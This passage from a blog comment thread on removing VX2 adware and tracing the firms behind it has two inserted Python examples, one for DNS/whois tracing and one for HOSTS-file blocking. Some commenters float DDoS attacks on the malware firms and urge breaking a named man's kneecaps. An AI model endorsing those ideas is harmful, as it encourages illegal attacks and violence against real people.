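ad.yieldmanager.com. 15 IN A 72.37.157.36

;; AUTHORITY SECTION:
ad.yieldmanager.com. 79 IN NS ns.yieldmanager.com.
"""

# Constructed sample: the registrant block of the whois output quoted above.
WHOIS_OUTPUT = """\
Domain Name: RIGHTMEDIA.COM
Registrar: DOTSTER, INC.
Registrant:
Right Media, LLC
276 5th Av. Ste. 401
New York, NY 10001
US
Administrative, Technical Contact:
Administrator, DNS
"""

# owner  ttl  IN  type  rdata  (tabs or spaces between fields)
RR_LINE = re.compile(r"^(\S+)\s+(\d+)\s+IN\s+(CNAME|A|NS)\s+(\S+)$")


def parse_answer_section(dig_text: str) -> List[Tuple[str, str, str]]:
    """Return (owner, type, rdata) for each record in the ANSWER SECTION only;
    AUTHORITY and ADDITIONAL records are ignored."""
    records = []
    in_answer = False
    for line in dig_text.splitlines():
        if line.startswith(";; "):
            in_answer = line.startswith(";; ANSWER SECTION")
            continue
        if not in_answer or not line.strip():
            continue
        m = RR_LINE.match(line.strip())
        if m:
            owner, _ttl, rtype, rdata = m.groups()
            records.append((owner.rstrip("."), rtype, rdata.rstrip(".")))
    return records


def follow_cname_chain(name: str, records) -> Tuple[List[str], List[str]]:
    """Walk CNAMEs starting at `name`; return the hostnames visited and the
    A records of the last one. A visited set guards against CNAME loops."""
    chain, seen = [name], {name}
    while True:
        targets = [rd for own, rt, rd in records if own == chain[-1] and rt == "CNAME"]
        if not targets or targets[0] in seen:
            break
        chain.append(targets[0])
        seen.add(targets[0])
    addrs = [rd for own, rt, rd in records if own == chain[-1] and rt == "A"]
    return chain, addrs


def registrant_org(whois_text: str) -> str:
    """Return the first non-empty line after 'Registrant:' in whois output."""
    lines = whois_text.splitlines()
    for i, line in enumerate(lines):
        if line.strip().lower().startswith("registrant"):
            for nxt in lines[i + 1:]:
                if nxt.strip():
                    return nxt.strip()
    return ""


def trace(start_host: str, dig_text: str, whois_text: str) -> Dict[str, object]:
    """Combine the DNS chain and the registrant into one attribution record."""
    chain, addrs = follow_cname_chain(start_host, parse_answer_section(dig_text))
    return {"chain": chain, "addresses": addrs, "registrant": registrant_org(whois_text)}


if __name__ == "__main__":
    print(trace("ad.firstadsolution.com", DIG_OUTPUT, WHOIS_OUTPUT))
```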

  120. Re: prosecution of aliens

    The US is just “part” of the world?

    Please…. Ok, all the countries who have been to the moon, raise your hands.

    (Counts ONE)

    Ok, the rest of you are THIRD WORLD COUNTRIES.

    ‘Nuff said.

  121. *ahem* “hypothetically” speaking…

    So far no one has been able to take legal action against them right?

    What if somebody organizes DDOS attacks on those companies responsible for developing, distributing, and generally helping along VX2 and coolwebsearch?

    If there’s no legal action to shut them down, hypothetically somebody might shut them down in other ways.

    Although, the option of making them go bankrupt by filing millions of lawsuits against them seems very interesting as well. The legal equivalent of a DOS attack :p

    • Re: *ahem* “hypothetically” speaking…

      Unfortunately, the people responsible for this particular piece of malware have made rather a lot of money on it–enough that the principal architect of this software drives around in a Lamborghini, and certainly more than enough money to pay for lawyers and others to investigate and prosecute illegal activity such as DDoS attacks. (I have myself received nastygrams from Canadian lawyers retained by some of the people named over this message.)

      Filing lawsuits against those responsible is a viable option for anyone living in Canada, or anyone with a great deal of cash; taking legal action against the residents of another country is an expensive proposition.

    • Re: *ahem* “hypothetically” speaking…

      That is true, tacit, but the U.S. has lots of leverage over Canada I’m sure. If someone can somehow convince our government that it is in their best interest to shut these guys down (can we say billions of dollars lost every year due to viruses and malware?), the government can pressure the Canadian government to turn these guys over.

      I’m *sure* we have lots of ways to get other governments to do what we want. Nixon did it back in the 70s with the Smithsonian Agreement. We got France to go along with the rebuilding of post-WWII Germany. We pressured Japan into voluntarily limiting their export of cars into the U.S., and even though it took a LONG time (something like 90 years?) we managed to get Canada to join in a regional trade bloc (NAFTA). I’m sure there are lots of carrots and sticks we have at our disposal should the government actually take an interest in this.

      Those guys have hurt U.S. citizens (and U.S. companies) so I’m sure there’s *some* grounds for extradition.

      • Re: *ahem* “hypothetically” speaking…

        No doubt, no doubt. But first, our government would have to take the issue of spam, viruses, and malware seriously–which so far, it doesn’t.

        We can but hope…

      • Re: *ahem* “hypothetically” speaking…

        thanks for the interesting reading..while i download stuff to try to get the vx2 off my kid's pc..i gave him firefox..but he still uses ie for the sites he goes to…this piece of crap virus makes me long for aim..ive been at this 5 hours now…of course his anti virus..adaware..spybotblaster..searchndestroy..were all out of date…son you update your stuff..yea dad…well..next and soon its reformat..kid go download your stuff,,,this virus crap is so out of hand i made a geocities website with all the links to spyware..etc..so i can redo the pc from one spot..

        • Re: *ahem* “hypothetically” speaking…

          Well..I got rid of the nasty lil snot..If this helps anyone..What I did was use adaware to find the .exe and .dll files..wrote the names down..went to start in dos mode..typed..edit…which opens the dos editor..found the .exe file..opened them..deleted and replaced random characters..trying to keep the file the same size.
          then went to..find files…got all files less than 83k..since the .dll was 82.5…and erased them if they were made in the date range..then ran adaware..then did online scan with firefox browser
          http://fr.trendmicro-europe.com/consumer/housecall/housecall_launch.php
          It uses java…so it works with firefox..unlike most..been 3 days.and all clean…

  128. Thanks for the info about these scumbags

    I’m 14 hours into trying to remove this little bastard. Glad I found your site just about to try your method.

    How can the world tolerate these criminals, how can we stop this type of activity.

    I’ll be back to let you know the result of my effort to murder this file. In my case it's a dll file that's been identified, not an exe. I cannot kill processes in task manager and it's not the usual reg key method of denying access to the task manager. Adaware advises this might be a new variant and to send the file, but if I try to mail the file it's reported as being 0kb and won’t send!

    • Re: Thanks for the info about these scumbags

      Well no luck so far, I have been round the loop 3 times now and I’m still stuck with this shit, this is day two and right now I could kill these bastards that put this shit out.

      Ad-Aware won’t show me an .exe file, although Norton shows a .dll; when I go into DOS it doesn’t exist?

      Oh, if you're worried about these scumbags suing you over that letter, send it to me, I’ll host it and they can try suing me. I’ll be quite happy to take these scumbags out into the open any time.

      • Re: Thanks for the info about these scumbags

        I have heard that VX2 is now incorporating rootkit technology, which hides its files from DOS and Windows. That may be why that file does not seem to exist when you open a DOS prompt. To see it, you may need to boot from some other volume, like a boot floppy or boot CD.

  134. Popup Window De-Cloaking

    Hello,

    Just wanted to submit a useful trick to help in identifying the sources of popups:

    Popups are usually spawned using a “clean” window layout, i.e.: no menus, no resize or anything, just the window and the content.

    However, IE allows you to open a new window (containing the current location) by pressing CTRL-N. Other browsers may do this as well.. In IE, the new window will usually have the user’s default layout (typically including the menu, address bar, etc..)

    Therefore, hitting CTRL-N on a popup window (assuming the popup is IE-based) will open another window containing the same page, but this time you’ll be able to view/copy/cut the URL (and do something useful with it.)

    I use this all the time to blackhole popup-serving host addresses in my HOSTS file, and it works like the proverbial charm.. 🙂
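    Once the URLs behind the popups are known (by the CTRL-N trick above, or from a list like the one posted earlier in this thread), the hosts can be blackholed in the HOSTS file. The following is an added example and not the commenter's own tooling; it works on the HOSTS text so the result can be reviewed before it is written back, and the sample URLs and HOSTS content are constructed.

```python
"""Blackhole popup-serving hosts in a HOSTS file (added example, not from the
original comment). Operates on text so the change can be reviewed first."""
from typing import List, Set, Tuple
from urllib.parse import urlsplit

# Constructed sample: URLs copied out of popup windows (mixed case, a port,
# a duplicate host and a localhost URL that must never be blackholed).
POPUP_URLS = [
    "http://www.onlineshopp-ing.com/muon.html",
    "http://www.onlineshopp-ing.com/neutron.html",
    "http://www.uniqueoffer-s.com/muon.html",
    "http://AD.FIRSTADSOLUTION.COM:80/st?ad=1",
    "http://localhost/test.html",
]

# Constructed sample of an existing HOSTS file with one entry already present.
EXISTING_HOSTS = """\
# Sample HOSTS file (constructed)
127.0.0.1       localhost
0.0.0.0         ad.firstadsolution.com   # already blackholed
"""


def hosts_from_urls(urls: List[str]) -> List[str]:
    """Unique lowercase hostnames from URLs; ports stripped, localhost skipped."""
    hosts: List[str] = []
    for url in urls:
        host = (urlsplit(url).hostname or "").lower()
        if host and host != "localhost" and host not in hosts:
            hosts.append(host)
    return hosts


def existing_names(hosts_text: str) -> Set[str]:
    """Every hostname already mapped in the HOSTS text; comments are ignored."""
    names: Set[str] = set()
    for line in hosts_text.splitlines():
        fields = line.split("#", 1)[0].split()
        names.update(n.lower() for n in fields[1:])  # fields[0] is the address
    return names


def blackhole(hosts_text: str, urls: List[str], sink: str = "0.0.0.0") -> Tuple[str, List[str]]:
    """Return (new_hosts_text, added_hosts). Existing entries are kept intact and a
    host that is already mapped is never duplicated, so the call is idempotent."""
    present = existing_names(hosts_text)
    added = [h for h in hosts_from_urls(urls) if h not in present]
    if not added:
        return hosts_text, []
    block = "\n".join(f"{sink}\t{h}\t# blackholed popup host" for h in added)
    text = hosts_text if hosts_text.endswith("\n") else hosts_text + "\n"
    return text + block + "\n", added


if __name__ == "__main__":
    new_text, added = blackhole(EXISTING_HOSTS, POPUP_URLS)
    print("added:", added)
    print(new_text)
```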

  136. My VX2 Experience

    I have had this virus for about 2 weeks … and now it seems to be gone???

    I first noticed something was wrong when the pop ups came (my pop up killer was ignoring them). I did a quick Hijack This scan and saw that there was a strange new dll – winlogin notify in my system32 directory. I tried to remove it, however it wouldn’t go away. I also went directly to that directory and noticed there were 2 or 3 similar files all around 229 k in size created at the same time with different names. There was also something called guard.tmp. I was able to delete the guard.tmp and one of the other instances. The others came up with a ” program used by another user/program” response. I have tried Adaware which first located one of the files, it couldn’t remove, but would try on reboot. Tried that and one was gone with 2 new ones in its place. I understand that this is how it protects itself. I loaded the VX2 cleaner add on, which has never identified any of the files. Since then I have tried safe mode, doesn’t work. Tried deleting from dos mode – doesn’t work. Have tried a brute force uninstaller – didn’t work. Have even tried to decompile it for a glimpse of what other programs it works with in an effort to shut it down for a split second to delete it – no luck. Also doing a find for those files within regedit has proved a waste of time as well. What has worked is that I have setup a shortcut to system32 on my desktop. When I reboot or log back in, I quickly go to that directory and seem to be able to delete the newest instance, which has kept only 2 (that I am aware of) instances of the virus in that directory. Finally what has seemed to work is this. For an online game (WOW) I needed to install the latest NVIDIA drivers. To do this you download the newest version, uninstall the old version, which needs to reboot to take effect. After reboot, you reinstall the new version with your security settings or program off. After the reboot, I looked at the system32 directory to delete the new instance of the virus, and all instances were gone. They have been gone for 48 hours ????? I am truly hoping that this is not some veiled trick, but no pop ups and no new instances. Hijack this scan shows that those files are missing/gone. Let me know your thoughts. I will take a look in my history and see what URLs I have, I know that I initially restricted some of the pop up sites, I’ll do some digging and post when I can.

    Cheers.

  138. Oooh, thank you for the link. The “religious beliefs are privileged” piece nicely summarized some stuff I’ve been thinking about lately – although I preferred your entry 🙂

  140. Wouldn’t a live Linux CD work, too?

    To make this process a little easier, couldn’t you go ahead and do the following in this order?

    1. Run Ad-Aware but have it NOT delete the files
    2. Insert a live Linux CD
    3. Unplug the computer when Ad-Aware is done
    4. Plug it back in, booting to the live CD

    Would that work?

  141. Get vigilante on their asses

    I’ve just spent hours of my valuable time getting rid of WinPC Antivirus malware – I assume this is similar or even an offshoot of VX2 you tracked down. It burns me up that millions of people besides myself are spending millions of wasted hours dealing with this crap, and nobody is doing anything about it. Somebody needs to get vigilante on their asses – a couple of broken kneecaps might help Cass Lativalle rethink whether it’s really worth the money they’re making on this scam.

    • Re: Get vigilante on their asses

      I definitely empathize.

      The antivirus malware isn’t his fault, though. It’s written and distributed by the Russian Zlob gang, who appear to be working with Russian organized crime. These are the same guys responsible for the attack on ISP iPower Web that I’ve talked about here, here, and here. They create malware and scareware that disguises itself in a number of ways–as porn movie player software, as video CODEC software, as bogus antivirus software, and the like, and they distribute it through a large, complex network of redirectors, Eastern European hosts, and compromised legitimate Web sites. They’re adept at finding new ways to distribute the malware, and have even made a (crude) Mac version of the malware.

  147. Rackspace

    I have had problems with Rackspace since 2008. They are webhosts for a very famous website owned by Charles Saatchi http://www.saatchi-gallery.co.uk

    The Saatchi site has allowed its members to abuse me on a daily basis for five years, leading to two arrests in 2008, but it continued. I have been subjected to libel, defamation and death threats.

    A legal organization helped me in 2008 after a blog containing an extreme porn image, supposedly of myself and my partner, was published on that website hosted by Rackspace; they took it down after that organization threatened legal action, along with 20 or so others. But months later they allowed it to happen again and ignored my requests to stop their clients.

    This matter has now progressed to a trial of our main abuser on the Saatchi website. Complaints to Rackspace seem to have had a limited effect and closed down the Saatchi chat room and forums two months ago, and they are still closed, but I have requested that Rackspace close the site down entirely, as I have proved Saatchi are in breach of every single one of the rules in Rackspace's AUP, but they have been ignoring my emails for weeks now, and I have threatened them with legal action now, especially as, in looking through old files on CDs from 2007/9 as further evidence the judge has requested, I was alarmed when I opened one of the live Saatchi webarchive files I had from their site from November 2007. I should say that since getting lots of suspicious activity on my computer in 2007 I have lost two new iMacs. This third one I got recently, and I decided to install Intego VirusBarrier before using it, and when a few weeks ago I opened that Saatchi file from a CD, Intego went crazy and a window popped up on the file telling me it is infected with a trojan horse. I sent a screenshot of it to Rackspace and they have ignored me entirely; I am now leaving the matter in the hands of my solicitors.
